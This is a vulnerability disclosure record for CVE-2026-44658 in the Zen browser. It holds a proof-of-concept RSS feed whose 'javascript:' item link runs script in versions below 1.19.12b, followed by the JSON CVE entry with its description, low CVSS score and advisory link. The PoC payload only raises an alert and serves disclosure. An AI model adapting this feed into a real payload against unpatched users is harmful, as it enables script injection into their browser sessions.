CVE-2026-44658

<!-- PoC RSS Feed for CVE-2026-44658 --> <!-- Save as .xml and add as RSS feed in Zen Browser < 1.19.12b --> <rss version="2.0"> <channel> <title>Malicious Feed</title> <item> <title>Clickbait</title> <!-- The browser does not validate this link protocol --> <link>javascript:alert('XSS via CVE-2026-44658')</link> <pubDate>Tue, 12 May 2026 12:00:00 GMT</pubDate> </item> </channel> </rss>

{"cve": {"id": "CVE-2026-44658", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:38.243", "lastModified": "2026-05-11T18:16:38.243", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zen is a firefox-based browser. Prior to 1.19.12b, RSS feed URLs entered by the user are validated to http: or https: in promptForFeedUrl, but item links inside the feed are not subject to the same restriction. The provider maps each RSS/Atom item link into item.url, filters only for presence and date, and returns the item list. The live-folder manager later creates pinned lazy tabs from these values with gBrowser.addTrustedTab(item.url, ...). This vulnerability is fixed in 1.19.12b."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://github.com/zen-browser/desktop/security/advisories/GHSA-cc9c-mmmf-c5j6", "source": "[email protected]"}]}}